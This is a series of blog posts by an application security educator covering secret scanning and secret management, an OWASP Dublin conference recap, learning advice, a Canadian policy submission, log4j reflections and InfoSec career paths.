Preventing Secrets in Code

Tanya in BC

When I started programming in the 90’s the security of software wasn’t on everyone’s mind like it is now. I took no security classes in my 3-year college computer science program, and it never even came up as a subject. I was taught to save the connection string for each different environment in the comments in your code, so it was easier for the next programmer to find them. It wasn’t until 2012 that someone ran a web app scanner (also known as a DAST – dynamic application security testing tool) on one of my apps. I didn’t understand a word of what I read in the report at the time. When I switched from programming to penetration testing, and then onto application security, there was quite a big learning curve for me.

Tanya Janca, in British Columbia, Malahat

Back to the Secrets

Secrets are what computers use to authenticate to other computers. For instance, an application sending a connection string to a database is its way of asking “I am this specific web app, please let me query your database.” When the database connection works, that’s the database’s way of saying “Sure thing!” Computers don’t have eyes, ears, or brains, so they can’t ‘recognize’ someone like humans can; they have to use secrets.

A secret can be a password, an API secret, a certificate, a hash, a connection string, etc. Most importantly: they should not be shared and should only be saved into your secret management tool. But I am getting ahead of myself.

This is a talk I gave in April 2023 at #Bsides San Francisco, “Hunting Secrets”. Similar topic!

Memories

When we save secrets into our code it is possible for another programmer to come along and use that secret; for better or for worse. They can login into your database, connect to your API, or anything else that the secret can be used for. Sometimes this can seem quite helpful, for instance if a client forgot their password when I was a programmer I used to log into the database, grab a copy of their password, use our decryption tool, and tell it to them over the phone. My whole team used to do it. Now I know that it’s more secure to have the user receive a password link in their email (to validate they are who they say they are), that the client’s password should have been salted and hashed (a one-way cryptographic method), and that the password to the database should have been kept in a secret management tool (making it unretrievable for human beings). Secrets in our code allow for all sorts of potential attacks, breaches, and embarrassments.

Finding Secrets

If you want to find out if you have secrets in your code, you can use a tool called a secret scanner. There are many on the market, and many of them are free. They use a variety of ways to try to find secret, but most commonly they use REGEX (regular expressions) to look for entropy (extremely long and random bunches of characters) and key words (password, secret, key, etc.).

When I work somewhere doing AppSec, I try to get read-only access to the code repositories as soon as possible (for many reasons, not just this). Once I have it, I download all the code, from all the projects I can, in a zip. I unzip it, point my secret scanner at it, and then settle in for a few hours to go hunting around in the code. Putting on music and getting a tasty warm beverage (hot chocolate anyone?) can make this a more enjoyable activity. It’s not exactly riveting.

Start by looking at the first finding. Sometimes it’s something really obviously bad, such as:

Password=”AliceandBobLearnIsMyFavoriteBook”;

That’s a secret for sure! The next step is to rotate that secret. Rotating this secret would mean changing the password to something new on the system this is used for. Then you check that new secret into your secret management tool (more on this soon), and then (the hard part) you update the code in this application to fetch the secret from your secret management tool instead and publish the updated code. Do not, under any circumstance, use the same value as the one you found. That secret has been ‘spoiled’, ‘spilled’, or ‘spilt’. It is no longer usable, as someone malicious might have it saved somewhere, or already be actively using it for malicious purposes.

You are going to need to follow this process for every secret you find. Sometimes it means regenerating a certificate, creating a new API, etc. It’s a bit of a pain, but it’s a lot better than having a data breach or other type of security incident to deal with.

Special Note: when you find a secret in the code, depending upon what you found, you may want to trigger the incident response (IR) process, to investigate as to if this secret has been used improperly. When you find a secret, you can’t know if you were the first, second, or tenth person to find it. Kicking off your IR process is a real-life application of the ‘assume breach’ secure design concept.

Preventing Secrets in the Code

Code repositories (also known as version control or ‘repo’) have several types of ‘events’ that can be used to trigger automation. When someone merges their code back into the main branch, you can automate it to run tests to verify it integrates nicely. When code is checked it, the repo can prompt someone else to review the changes before it is merged into all the other code. The event we are interested in is called a ‘pre-commit hook’.

The moment someone checks code in that contains a secret, they have spilt it. The secret will be in the history and backups and maybe even in the logs. You must rotate it. Even if you realize your mistake only 5 minutes later, the damage is done.

A pre-commit hooks allows you to run your secret scanning tool on only the new or changed code you are checking in, and if it finds a secret, it stops the check-in process. It gives the user an error message, explaining that it thinks it has found a secret, and blocks the code from being checked in. This means the secret has not been spilt; no secret rotation required! If you code does not have a secret in it, your check in continues, and any other events you set up do their thing. The test takes so little time, that is almost unnoticeable to the end user.

Secret Management

Secret Management tools did not exist when I started programming. In fact, they are somewhat ‘new on the scene’ and not widely adopted, yet. Secret management tools manage secrets for machines. They are not password managers, which manage secrets for humans. They are still fantastic though!

When using secret management tools, generally we create a new vault (an instance of encrypted secrets) per system (the application to which those secrets belong). We do this so that if one vault is compromised somehow (perhaps the vault is lost or corrupted), then only one system will be harmed. We also do this to ensure the vault is accessible by whatever system it supports; you wouldn’t want to have to open a hundred holes in your firewall so that all your systems can connect to it.

When we check a secret into a secret management tool, we say goodbye to it forever. We do not keep a copy elsewhere, because we can trust the secret management tool to keep it safe for us. It’s encrypted in the vault, and it is retrieved only programmatically (humans cannot ‘reveal’ the secret in plaintext). Your CI/CD can retrieve it, your application, APIs, etc. This means your secrets are managed in an automated way, leaving zero room for human error. Trust me, it’s a good deal!

Tips

As you follow the process of finding all the secrets, you should take note of false positives, so you can suppress them in the future. An example I ran into myself: there was a license key for a mail merge program, but the company who made the program had gone out of business years ago. This meant that they weren’t breaking any licensing agreement to use it all over the place, and they didn’t need to protect the key because it could be used as many times as they liked. That meant it wasn’t really a secret anymore. We suppressed the license key from then on.

You should create rules to avoid false positives, as it will become annoying over time if you have weird situations like the one mentioned above.

Conclusion

If you work at an organization that has a lot of technical debt, cleaning up all of your secrets can take quite a lot of time. That said, if you have an intern, co-op student, or junior application security person on your team, this is an ideal task for them. It’s lots of work, it’s easy to do, and it looks good on a resume. It also reduces the risk of your organization greatly, which is always a big win.

Happy (secret) hunting!

OWASP Global AppSec Dublin 2023

Tanya Janca Speaking on stage

Recently I had the pleasure of being one of the keynote speakers at OWASP Global AppSec, in Dublin Ireland. In this post I’m going to give a brief overview of some of the talks I saw while I was there, and the TONS of fun I had. I didn’t get to stay very long, and due to jetlag I fell asleep a few times when I wished I could have stayed awake, but overall I would recommend this event (and all the OWASP Global AppSec events) to anyone who is interested in application security, OWASP, or Guinness beer. This is going to be a long blog post, get yourself a beverage and get ready for lots of pictures!

I landed the morning before the conference, and met up with two friends I hadn’t seen in far too long, Takaharu Ogasa from Japan, and Vandana Verma from Bangalore India. I also met another speaker for the event named Meghan Jacquot!

Takaharu Ogasa, Tanya Janca, Vandana Verma and Meghan Jacquot!

The evening before the conference I had wanted to set up a We Hack Purple in-person meetup, but I was running short on time. Luckily, my friends at SemGrep invited me to a free pre-conference networking event, so I invited all the WHP folks to meet me there. Unfortunately, WAY too many people where there (the place was supposed to hold 50-100 people, but 200 showed up). Although I got to see many friendly faces (see Jessica Robinson, Vandana and I below), it was far too crowded for me. As a Canadian, we’re used to 13 square kilometres of personal space, per person, and it was a bit much for me. ;-D

Tanya Janca, Vandana Verma and Jessica Robinson

Luckily Adam Shostack invited me to a super-secret-speaker’s dinner the same evening, held in a giant church that had been converted into an amazing live music venue! There were tap dancers, fiddlers, OWASP Board Members, and Adam did an impromptu book signing!!! Thank you Adam! Next to Adam is Avi Douglen of the OWASP Board of Directors, and also an avid threat modeller.

Adam Shostack signing books, with Avi Douglen

The next day I woke up extremely early (6:00 am), thanks to a crying baby in the room next to mine at the hotel. :-/  I used this time to call home and practice my talk: Shifting Security Everywhere. You can download a summary of my presentation here. (Note: you are supposed to join my mailing list to receive the PDF, but my mailing list is awesome, so hopefully you feel it’s a good trade. Also, you can easily get around this if you truly do not want to subscribe, simply do not press the ‘confirm subscription’ link).

Grant Ongers, from the OWASP board of directors, kicked off the conference by announcing a brand-new award “OWASP Distinguished Lifetime Member” and then announced the first 4 winners: Simon Bennetts, Rick Mitchell, Ricardo Pereira, and Jim Manico.  As a person who has volunteered many hours for OWASP, I felt it was beautiful to see 4 extremely dedicated volunteers receive this much-deserved award. I am very proud of all of them and their amazing contributions to our community! Great job OWASP for thinking of this new way to show appreciation by publicly recognizing some of our most-dedicated volunteers!

Grant Ongers presenting award to Simon Bennetts

The very first talk of the conference was called “A Taste of Privacy Threat Modeling” by a woman named Kim Wuyts, introduce by Avi Douglen (Member of OWASP Board of Directors). She spoke about threat modelling privacy, and used ice cream analogies to explain how marketers see our data. I like ice cream, privacy, AND threat modelling, so this was a real treat (pun intended!). I care a lot about privacy, both personally and professionally, and loved how she used situations we are all familiar with (including eating ice cream too fast then ending up with brain freeze!) to explain various concepts within privacy and threat modelling. I feel like any person, with zero previous technical experience or knowledge, would have been able to follow her entire talk, which is quite rare at a conference like this. She also made her OWN threat modelling privacy game! Nicely done Kim!

After that I went to see Chris Romeo’s talk about “Ten DevSecOps Culture Fails”. Chris is also the host of the Application Security podcast, and I’ve been following his work for quite a while. He did not disappoint!

Chris Romeo, speaking

After the delicious lunch of yummy curry and rice, and more than one latte, we had the afternoon keynote. Grant Ongers introduced Jessica Robinson, who explained “Why winning the war in cyber means winning more of the everyday battles”. She shared several personal stories from her career, including what it was like to be a woman of colour working in STEM, her obsession with the Kennedys, implementing the first cyber security policy at a large law firm in New York City, and more! The thing I liked most about her presentation was how she took us on a journey. She’s an incredibly gifted public speaker, and she started by getting us all to close our eyes, then imagine various things, before opening our eyes and formally beginning her talk.

Part way through Jess’ presentation the videographer fainted, fell, and made a huge loud noise. He’s okay, don’t worry readers! All 500 of us turned around and started becoming concerned. She inquired as to if he was okay, a bunch of staff rushed to take care of him, and once it was clear there was no danger, she recommenced her talk. Not very many speakers would be able to recover like she did. To be able to fully capture our attention again was very impressive. I’m say this as a person who was a professional entertainer for 17 years, and then professional public speaker for 6 years; that is an incredible feat. By the end I had completely forgotten about the fainting, because I was so wrapped up in her and the tales she was telling. Anyway, she’s amazing.

Jessica Robinson, being amazing

At this point I have a silly complaint. Usually when I go to an InfoSec conference, there are only a handful of talks that interest me. I always want to see all of the AppSec talks, maybe some quantum computing, anything to do with using AI to create better security, or topics about cyber warfare (which equally interest and frighten me). But it’s rare at a conference that is not AppSec-focused that I have conflicts in the schedule of things that I really want to see. This happened a LOT at this conference. Sometimes there would be 3 different talks, at the same time, that I was dying to see. I found it very difficult to choose for some of the time slots, which may sound strange, but I’m a very decisive person. Not being able to decide is rare for me. That said, I am pleased to report that all of them were recorded, even if we all know it’s not quite as good as being there in person. I will try to add links to all the talks listed here once the videos are out so that you can enjoy them too!

Seba Deleersnyder and Bart De Win

This is my favourite picture from the entire conference. When you work on an open-source project with someone, you are working because you love what you are doing. When everyone on your team really cares about your goal, you can become very good friends. It is very clear the SAMM team are great friends! I love seeing OWASP bring people together! <3

The talk from the image above was about the OWASP SAMM project – The Software Assurance Maturity Model, presented by Seba Deleersnyder and Bart De Win. I live tweeted their talk (link here), if you want a play-by-play. The essence of their presentation was updates about the project from the past 2-3 years, and how they have worked with the community and industry to update, expand, and improve the model to be more helpful, by creating tools, surveys and online documentation to make their project more useful for everyone. I had been planning on writing a blog post about the project called “OWASP SAMM, for the rest of us”, because I find clients are often very insecure that they won’t ‘measure up’ to the SAMM standard. I hope I can help a bit by breaking things down into smaller pieces, and helping teams start where they are at, then working their way up over time. SAMM can work for any team, just be realistic and try not to be too hard on yourself! We all have to start somewhere.  

After Seba and Bart’s talk it was time for the networking event. OBVIOUSLY, they had Guinness beer on tap! We were in Ireland! I had a great time, chatting with all sorts of people, and I got an awesome gift of a Tigger-striped hoodie from Avi Douglen, which made my day! Then I went back to my hotel room to practice my talk, approximately a thousand times.

Tanya Janca, presenting on a stage

Side note: Remember the baby in the hotel room next to mine? The night before my talk it started crying, loudly, at 3:00 AM, and continued crying all the way until 6:00 am. I was up almost the entire night. Which gave me plenty of time to practice my talk. Yay?

Usually when you see me present a ‘new’ talk at a conference, it is not the first time that I have presented it. In fact, I have often given it 5 to 10 times, in front of 1 or 2 people each time, which is why I usually seem so comfortable on stage. I always practice new material on people from my community (We Hack Purple, OWASP Ottawa, the Ottawa Ladies Code Meetup, WoSEC Victoria, etc.). I’ve always turned to my community for feedback, advice, and encouragement. They have always been gentle, kind, and give reliably fantastic advice! I would recommend every speaker do this! But this time, because I was asked to do this with so little time, I hadn’t presented it in front of anyone. In fact, I was still writing it as I flew across the ocean to the venue. I WAS SO NERVOUS!!!!!

Tanya Janca, presenting on stage

But it went really well anyway!  Phew! And Matt Tesauro introduced me, so that was extra-nice! Matt is on the OWASP Board of directors and a leader of the Defect Dojo Project. Actually, he’s been a part of several different projects and chapters over the years. He was kind enough to distribute the maple-candies I brought to give to all the people who asked questions. Having a long-time friend introduce me made me a lot less nervous! Thank you Matt!

Tanya Janca, smiling for the camera

Now that my talk was over, I could concentrate completely on having fun! I ended up in the hallway speaking to lots of people and missing the talk after mine. Then we had lunch, and then came another time slot where there were THREE talks I wanted to see. THREE amazing presentations to choose from! I ended up in Tal Melamed’s talk, about the OWASP Serverless Top Ten. I had spoken to Tal many times before, but it was our first time meeting in person, so that was pretty exciting for me. I even managed to sit with him for lunch! Even though I already knew the Serverless Top Ten, it was still exciting to see Tal speak to it. As a bonus, he ended slightly early, so I was able to catch the Q&A after Matt Tesauro’s talk about Hacking and Defending APIs – Red and Blue make Purple. I felt this was a good compromise.

After lunch the wonderful Vandana Verma got on stage to introduce the last keynote speaker. She told us all that there would be “a BIG announcement” at 5:30 pm, so we had better not leave early. For those that don’t know, the big announcement was that OWASP has officially changed their name (but not the acronym). Previously it stood for ‘Open Web Application Security Project”, but that name was limiting. People often complained that we kept straying outside our purpose, by including cloud, containers, etc. But why would we want to limit ourselves like that? So the board of directors voted to change it to “Open World Wide Application Security Project”, which I have to say, I like WAY BETTER. Nicely done board!

The last keynote was Dr. Magda Chelly, and it was spectacular! In her talk, AI-Assisted Coding: The Future of Software Development; between Challenges and Benefits, she spoke about how AI is going to change the way most of us work, especially those of us in IT. I don’t want to give away the entire talk, but… She explained how many of us could work with AI, the difference between AI-assisted and AI-created content (this is more important that I had previously realized), and all the issues and questions around who owns the copyright of such work. If an AI creates a poem, but you asked it to create a poem, and gave it the parameters to create said poem, who owns the copyright? What if it only assisted you in creating an application, it didn’t write all the code, just some of the code? Who owns that? Also, when we train AI on certain data, but that data has specific licensing, then the AI creates code that is not licensed in the same way, has the created code broken the license agreement? There was a fascinating discussion during the Q&A, and it definitely has me thinking about such systems in a very new way.

Magda being amazing!

The last talk that I saw at the conference was present by someone named Adam Berman, it was called “When is a Vulnerability Not a Vulnerability?”. For those of you who have followed me a long time, you would know that I wrote a blog post with that exact title in 2018 (read it here). My post was about when vulnerabilities are reported to bug bounty programs, but they are not exploitable/do not create business risk, is it really a vulnerability? In it I explored a ‘neutered’ SQL injection attack, and of all the posts I have ever written, it has received by far the most scrutiny.

That said, although there was a similar slant, it was definitely not based off of anything I have written or spoken on. Which made it extra-exciting for me!

Adam works at R2C (who make SemGrep), so all of the research came from them. In April of this year, I will be co-presenting a workshop at RSA with Clint Gibler (of R2C and TL;DR Sec fame) about ‘How to Add SAST to CI/CD, Without Losing Any Friends’ (no link available at this time). We will be using SemGrep to demo all the lessons, so I was extra-curious to see Adam speak!

Brian presenting SemGrep

Adam’s talk was all about traceability in Software Composition Analysis (SCA). A reoccurring issue that happens when you work in AppSec is developers not having enough time to fix everything we ask them to. We (AppSec folks) are constantly trying to persuade, pressure, demand, and even beg developers to fix the bugs we have reported. One of the most convincing ways to get a developer to fix a bug is by creating an exploit. But that is VERY time consuming! It’s not realistic for us to create a proof-of-concept exploit for every single result that our scanners pick up. Layer on top of this the fact that automated tools tend to report a LOT of false positives, and this leads many developers to question if they absolutely need to fix something, or if “maybe we can fix it until later”. And by “later” I mean “never”.

If you scan an application with an SCA tool, most of them will tell you if any of the dependencies in your application are ‘known to be vulnerable’. They do this by checking a list of things they know are vulnerable (they create this list in many ways, and Adam covered that, but that part is not the exciting part, you can learn that anywhere). Think of the SCA tool working like this: “Are you using Java Struts version 2.2? Yes? It’s vulnerable! I shall now report this to you as a vulnerability!” But just because the dependency has a vulnerability in it, it doesn’t necessarily mean that you application is vulnerable, and here lies the problem.

More Brian!

If your application is not calling the function(s) that have the vulnerability in them, then your app shouldn’t be vulnerable (in most cases this is true, there are rare exceptions, specifically Log4J). Previously, SemGrep released a blog post about this (you can read it here), and they claim that approximately 98% of all results from SCA tools are false positives, because the vulnerable function within the dependency is never called from the scanned app. Which means there’s no risk to the business. Which means it’s a false positive. It’s still technical debt, which is not great, but it’s not a great big hole in your defenses, and that’s a very different (and much less scary) problem.

If you’ve been begging developers to update all sorts of dependencies, imagine if you reduced your number of asks by 98%? And you could show them where their app is calling the problematic function? That conversation would likely be a lot less difficult. In fact, I bet the developers would jump to fix it. Because it would be obvious that it’s a real risk to the business.

This is a BIG CLAIM, so I wanted to hear the details in person. And I did!

Moi

Because this was an OWASP event, Adam couldn’t just say “Yo, SemGrep is awesome, buy our stuff”. If he did that it also would also make for a not-very-entertaining-or-believable presentation. Instead, he explained HOW to do this yourself. And just how much work it is. Spoiler alert: it’s a lot of work.

Although I would love to provide the technical details for you, I have to admit that I was almost falling asleep the entire time because of the “absolutely no sleep” situation from the night before with the crying baby. I must have yawned 100 times, and I was more-than-a-little concerned I may have offended the speaker! That said, I can’t give you the details, but I will post a link here as soon as I have it so you can watch Adam explain. He’s better at explaining it anyway!

Then I went to bed (at 4:00 pm, and I slept all the way until 5:00 am the next day!). After that I headed to the airport, flew home, and wrote this on the plane! I hope you enjoyed my summary of my experience at OWASP Global AppSec 2023, held in Dublin, Ireland, February 14th and 15th, 2023.

– fin –

Tanya on stage

Continuous Learning

Tanya Smiling

Working in the information technology (IT) field means you need to be comfortable with things at work constantly changing and the need to continue to learn as your career grows. Working in information security (InfoSec) means you not only need to keep up with all sorts of IT trends, but also the attacks, defenses, and mitigations for each. When I started learning about DevOps, and how they value continuous learning and ‘taking time to improve your daily work’, I was sold. But I wasn’t quite sure how to go about putting it into practice.

Tanya Janca, in British Columbia, Malahat

When I switched from being a software developer to a penetration tester, and then onto application security, I had a lot to learn. On top of that, I am dyslexic, so the more common ways that people learn don’t always work well for me. Even worse, my training budget for my job in the Canadian Public Service was $2,500 CAD a year (approximately $1900 USD) and I wasn’t allowed to travel for courses. Living in Ottawa, Canada at the time, there weren’t very many options that were within my reach.

I started out my security career switch with a professional mentor, but the first one didn’t work out very well. He got frustrated with me quickly, no matter how hard I tried. Although I found out later that his expectations were near-impossible to meet, and what was asked of me was not very reasonable (nor ethical at a times). Example: He asked me on a Friday to learn pentesting over the weekend, with no help or advice, and then told me to do my first pentest the following Monday, setting me loose on a client’s live production system, with zero previous experience. It did not end well. For me and the client. The mentor and I went our separate ways.

By this point I had started joining security communities. And I LOVED it. My favourite community of all the local ones I could find was OWASP, the Open Web Application Security Project. The Ottawa chapter was led by someone named Sherif Koussa, who I am proud to still call my friend and mentor today. I made friends quickly, found more than one new mentor, and even became a chapter leader. I learned a lot by inviting speakers, talking to others in the community, and volunteering for projects.

Eventually I started doing public speaking, which provided me with free tickets to conferences, and sometimes even free training! I also started my own OWASP project (OWASP DevSlop) so that I could learn how to secure software in a DevOps environment.

It became clear to me, very quickly, that I learn best by reading/listening/watching something, then trying it for myself, then teaching it to someone else. I also enjoy learning more when I follow this process, rather than only reading or watching videos. I realize this is way more work than just reading a book, but everyone is different. And I’m lucky because other people seem to like my style of teaching and writing, which motivates me in a way I had never previously known. 😀

Eventually I wrote my own book (Alice and Bob Learn Application Security), started my own tiny Canadian startup (We Hack Purple), and opened my own online academy and community.

But that’s what worked for me. You need to find what works for you.

Below is a long list of ways that you can use continue your learning. If you have more ideas, please send them to me and I will add them!

General Advice:

  • Find what you are interested in. Join communities (online and local, if possible) that focus on those topics. Make friends if you can!
  • Finding out what you are interested in might take a lot of time, that’s okay! It took me 2 years to figure out I wanted to do AppSec, not PenTesting. You need to find the right place for you.
  • If you fear that you are too old to learn, please put that notion aside. You CAN learn. If this belief is holding you back, talk to someone who cares about you, and let them talk you out of it. Everyone has doubts sometimes, people who love you can help you look past them.
  • Find out if there are learning opportunities at work. Sometimes you can job shadow someone or help on certain projects. I kept volunteering to help the security team at my office and eventually they let me join the team!
  • Some organizations offer coaching services to employees. Usually it’s for leadership, but I used to work somewhere as an AppSec coach. I trained up the junior people into AppSec pros; it was great!
  • If your office pays to bring in a trainer, it’s often significantly less costly than sending them all individually to courses. See if you can join forces with other teams, departments, or even other organizations to create a larger budget.
  • Ideally you will aim to learn about best practices that are agnostic in nature, and then also learn about your specific tech stack that you use at work. This could mean a general secure coding course, with a break-out session on your specific programming language, framework, cloud provider, etc.
  • If you are reading this and you are on the security team, and you are planning to train your developers on security for the first time, if anyone seems nervous, you might want to assure them all that no one is losing their job. It might sound strange, but sometimes when there’s change, people worry. If you can remove their worries, they will learn more, and hopefully maybe even enjoy it. Pay attention for this and reassure people if the need arises.
  • If you are planning learning for others, communicate your plan, in advance. Let them know what’s coming. It helps people prepare themselves, and you are likely to get better results.
  • If possible, provide training in multiple formats (audio, visual/diagrams/images, hands on, written, etc.) so that every person’s learning style is accommodated. If you’re not sure how you learn, try a few different ways and see which one “feels right”. That’s likely the best one for you!
  • Give yourself short breaks. A microbreak (5-15 seconds to laugh at a meme or read a few short posts on mastadon) can help you move the information from your short memory into long term memory, meaning you are more likely to be able to apply what you learned, and remember it for significantly longer.
  • Take tests or give yourself tests. Not so that you can see how you measure up against others, but to make yourself remember the things you’ve learned. Practising ‘recall’ will help ensure you’ve learned (not memorized) the new information.
  • Set a time aside for yourself each day and slowly watch recorded conference talks and other content that are of interest to you. Consuming information is smaller chunks can make it easier to absorb. If you aren’t sure which videos, books or articles that you want to start with, ask for suggestions from people in your community.
Tanya Janca, Presenting at B-Sides Ottawa, November 2022. Ottawa, Canada

Application Security Learning Opportunities:

I hope this helps you on your continuous learning journey!

Consulting on Canada’s Approach to Cyber Security

Good job Public Safety!

You may not be aware but Canada’s Public Safety department put out a call to Canadian Citizens (sorry brilliant people who are not Canadian), asking for ideas, suggestions and thoughts on what they should prioritize next for the Canadian Government for InfoSec. I WAS SO EXCITED WHEN I SAW THIS AND WROTE THEM IMMEDIATELY. Obviously I made suggestions about AppSec. You have until August 19, 2022 to send your suggestions. The suggestions that I sent are below.

Good job Public Safety!
Good job Public Safety! I’m so impressed!

Hi!

I am responding to calls for suggestions from this link: https://www.publicsafety.gc.ca/cnt/cnslttns/cnsltng-cnd-pprch-cbr-scrt/index-en.aspx  I used to work for the Canadian Public service, and now work in private industry.

  1. I would like to see the Canadian Public Service and Government of Canada focus on ensuring we are creating secure software for the public to use. I want to see formal application security programs (sometimes called a secure system development life cycle or S-SDLC) at every department. I have extensive training materials on this topic that I would be happy to provide for free to help.
  2. I would also like to see a government-wide training for all software developers on secure coding, and AppSec training for every person tasked with ensuring the software of their department is secure. When I was in the government (13.5 years), I was never allowed to have security training, because it was too expensive ($7,000 USD for a SANS class was completely out of reach). I was told the government wouldn’t arrange giant classes (say 100 people, splitting the cost of one instructor), because that would be ‘unfair competition with private industry’. You need to fix that, having mostly untrained assets is not a winning strategy. There needs to be a government-wide training initiative to modernize your workforce. (Again, I have free online training that can be accessed here: https://community.wehackpurple.com – join the community (free), then take any courses you want (also free))
  3. Create security policies that apply to all departments, then socialize them (do workshops, create videos, make sure everyone knows – don’t just post them to the TBS website and hope someone notices on their own). A secure coding guideline. An AppSec program/secure SDLC. Incident response, etc. Each department shouldn’t have to start from scratch each time. Then we could have a standardization of what level of security assurance that we expect from each department.  I provide some of these policies in the AppSec foundations level 2 course, which is free in the link above.
  4. Throw away all the old policies and procedures that are just not working. 90-day password rotation? Gone. SA&A process that takes several weeks to complete but doesn’t actually offer much in the way of actionable advice? Gone. Re-evaluate current process, get rid of the bad ones. We need agile processes, that let people get their work done. I felt like many of the processes that I had to do in the government were in place because of a lack of trust in the staff’s competency. Instead of not trusting the staff, train them, then trust them. If they continue to screw up after training, discipline them and eventually get rid of the bad apples. Most of your staff is GOOD. Some of them are truly amazing. Treat them with trust and many of them will astound you. Remove onerous administration that is there because you don’t trust them, then let them get their jobs done.

If you have any questions I would love to talk. Thank you for putting out an open call, I’m super-impressed!

Tanya

Why can’t I get over log4j?

Image of Tanya Janca

I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved (one company estimated 100 weeks of work, completed over the course of 8 days of time) in the response was spectacular, and the damage caused is still unknown at this point. We will likely never know the true extend of the cost of this vulnerability. And this bugs me.

Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.

I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect story telling experience you are used to here, bear with me, please.

Short rehash: log4j is a popular java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar, and if vulnerable, the user would have remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.

Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased my multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”, interesting….

I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.

I happened to be on the front line at the time, doing a 3-month full time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.

I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…

For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.

Some vendors responded very strongly, with Contrast Security giving away a surprise tool (https://www.contrastsecurity.com/security-influencers/instantly-inoculate-your-servers-against-log4j-with-new-open-source-tool ) to help people find log4j on servers. They could likely have charged a small fortune, but they did not. Hats off to them. I also heard of one org that was using the new Wiz.io, apparently it did a very fast inventory for them. I like hearing about good new tools in our industry.

I heard several vendors have their customers demand “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool has nothing to do with libraries, and therefore it’s not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….

Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.

Those that had WAF, RASP, or CNDs were able to throw up some fancy REGEX and block most requests. Not a perfect or elegant solution, but it saved quite a few company’s bacon and reduced the risk greatly.

I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that it is a vulnerability in itself. Log4j proved this, as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly, this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”

Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.

Sharing Another Talk with the Community

Me, delivering this talk for the first time, on stage.

Three years ago I decided that I would share most of my talk content with my community (everything that I am not currently applying to conferences with). At the time, I only shared one, because…. I ran out of time. Now it’s time to share the second talk, “Security is Everybody’s Job!” By “share” I mean give my express permission for anyone, anywhere, to present content that I have written, with no need to pay anything or ask for my consent. You can even charge money to give the talk! Please, just teach people about security.

In efforts to ensure anyone who presents my material has a good experience I made a GitHub repo with an instructional video of what to say, a readme file with written instructions and links so you can watch me do the talk myself.

Me, delivering this talk for the first time, on stage.
Me, delivering this talk for the first time, on stage, at DevOpsDays Zurich, in in beautiful Switzerland.

I’ve had a few people ask me why I would do this, and there are a few reasons.
* To spread the word about how to secure software; it’s important to me to try to make the internet and other technologies safe to use.
* To help new speakers (especially from underrepresented groups). If they have something they can present, with instructions they can follow, hopefully it will help make them more confident and skilled at presenting.
* To share knowledge with my community in general: sharing is caring, yo.
* The more people who present my talk the more people who may decide to follow me. SO MUCH WIN!

You can give this talk at any IT meetup, especially DevOps, InfoSec or any software development meetup.

Please go forth and teach AppSec! And if you have feedback I want to hear it!

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!

Jobs in Information Security (InfoSec)

Image by Henry Jiang of Oppenheimer & Co.

Almost all of the people who respond to my #CyberMentoringMonday tweets each week say that they want to “get into InfoSec” or “become a Penetration Tester”; they rarely choose any other jobs or are more specific than that. I believe the reason for this is that they are not aware of all the different areas within the field of Information Security (InfoSec for short, and “Cyber” for those outside of our industry). I can sympathize; I was in the same position when I joined. I knew three Penetration Testers and lots of Risk Analysts and I had no clue that there were several other areas that may interest me or even existed. I knew I didn’t want to be a Risk Analyst, so I thought the only other option was PenTester. Now I know that is not true at all. This blog post will detail several other areas within the field of Information Security in hopes that newcomers to our field can find their niche more easily. It will not be exhaustive, but I’ll do my best

Image by Henry Jiang of Oppenheimer & Co.

The above image shows 8 different potential areas within the field of Information Security according to the author, Henry Jiang; Governance, Risk, Career Development, User Education, Standards, Threat Intelligence, Security Architecture and Security Operations.

Since I come from the software development side of IT, and have done almost exclusively coding, my view is going to be extremely biased. With that in mind, the first area you may want to consider is Application Security (AppSec); any and all work towards ensuring that software is secure. This is the field that I work in, so it will have the most detail. There are all sorts of jobs within this field, but the most well-known is the web app pentester (sometimes called an ethical hacker); a person who does security testing on software. Such a person is often a consultant, but can also work in large companies. They test one system, intensively, perform a lot of manual testing, and then move on.

Jobs in Application Security:

  • Application Security Engineer — you do a mix of all the things listed under AppSec and you are generally a full-time employee. This includes making customer tools, launching a security champion program, writing guidelines, and anything else that will help ensure the security of your organization’s apps. I personally consider this the sweet spot, as I get to do changing and interesting work, and see the security posture improve over time. It is, however, usually a more senior role.
  • Threat Modeller, working with developers, business representatives and the security team (that’s you in this scenario) to find and document potential threats to your software, then create plans to test for and fix the issues.
